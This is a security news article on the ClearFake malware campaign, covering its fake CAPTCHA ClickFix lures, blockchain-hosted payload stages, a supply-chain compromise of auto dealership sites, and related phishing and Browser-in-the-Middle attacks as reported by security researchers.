The threat actors behind the ClearFake campaign are using fake reCAPTCHA or Cloudflare Turnstile verifications as lures to trick users into downloading malware such as Lumma Stealer and Vidar Stealer.
ClearFake, first highlighted in July 2023, is the name given to a threat activity cluster that employs fake web browser update baits on compromised WordPress as a malware distribution vector.
The campaign is also known for relying on another technique known as EtherHiding to fetch the next-stage payload by utilizing Binance’s Smart Chain (BSC) contracts as a way to make the attack chain more resilient. The end goal of these infection chains is to deliver information-stealing malware capable of targeting both Windows and macOS systems.
As of May 2024, ClearFake attacks have adopted what has by now come to be known as ClickFix, a social engineering ploy that involves deceiving users into running malicious PowerShell code under the guise of addressing a non-existent technical issue.
“Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain,” Sekoia said in a new analysis.
“By using smart contract’s Application Binary Interfaces, these interactions involve loading multiple JavaScript codes and additional resources that fingerprint the victim’s system, as well as downloading, decrypting and displaying the ClickFix lure.”
The latest iteration of the ClearFake framework marks a significant evolution, adopting Web3 capabilities to resist analysis and encrypting the ClickFix-related HTML code.
The net result is an updated multi-stage attack sequence that’s initiated when a victim visits a compromised site, which then leads to the retrieval of an intermediate JavaScript code from BSC. The loaded JavaScript is subsequently responsible for fingerprinting the system and fetching the encrypted ClickFix code hosted on Cloudflare Pages.
Should the victim follow through and execute the malicious PowerShell command, it leads to the deployment of Emmenhtal Loader (aka PEAKLIGHT) that subsequently drops Lumma Stealer.
Sekoia said it observed an alternate ClearFake attack chain in late January 2025 that served a PowerShell loader responsible for installing Vidar Stealer. As of last month, at least 9,300 websites have been infected with ClearFake.
“The operator has consistently updated the framework code, lures, and distributed payloads on a daily basis,” it added. “ClearFake execution now relies on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands.”
“The number of websites compromised by ClearFake suggest that this threat remains widespread and affects many users worldwide. In July 2024, […] approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”
The development comes as over 100 auto dealership sites have been discovered compromised with ClickFix lures that lead to the deployment of SectopRAT malware.
“Where this infection on the auto dealerships happened was not on the dealership’s own website, but a third-party video service,” said security researcher Randy McEoin, who detailed some of the earliest ClearFake campaigns in 2023, describing the incident as an instance of a supply chain attack.
The video service in question is LES Automotive (“idostream[.]com”), which has since removed the malicious JavaScript injection from the site.
The findings also coincide with the discovery of several phishing campaigns that are engineered to push various malware families and conduct credential harvesting –
- Using virtual hard disk (VHD) files embedded within archive file attachments in email messages to distribute Venom RAT by means of a Windows batch script
- Using Microsoft Excel file attachments that exploit a known security flaw (CVE-2017-0199) to download an HTML Application (HTA) that then uses Visual Basic Script (VBS) to fetch an image, which contains another payload responsible for decoding and launching AsyncRAT and Remcos RAT
- Exploiting misconfigurations in Microsoft 365 infrastructure to take control of tenants, create new administrative accounts, and deliver phishing content that bypasses email security protections and ultimately facilitates credential harvesting and account takeover (ATO)
As social engineering campaigns continue to become more sophisticated, it’s essential that organizations and businesses stay ahead of the curve and implement robust authentication and access-control mechanisms against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques that allow attackers to hijack accounts.
“A pivotal benefit of employing a BitM framework lies in its rapid targeting capability, allowing it to reach any website on the web in a matter of seconds and with minimal configuration,” Google-owned Mandiant said in a report published this week.
“Once an application is targeted through a BitM tool or framework, the legitimate site is served through an attacker-controlled browser. This makes the distinction between a legitimate and a fake site exceptionally challenging for a victim. From the perspective of an adversary, BitM allows for a simple yet effective means of stealing sessions protected by MFA.”
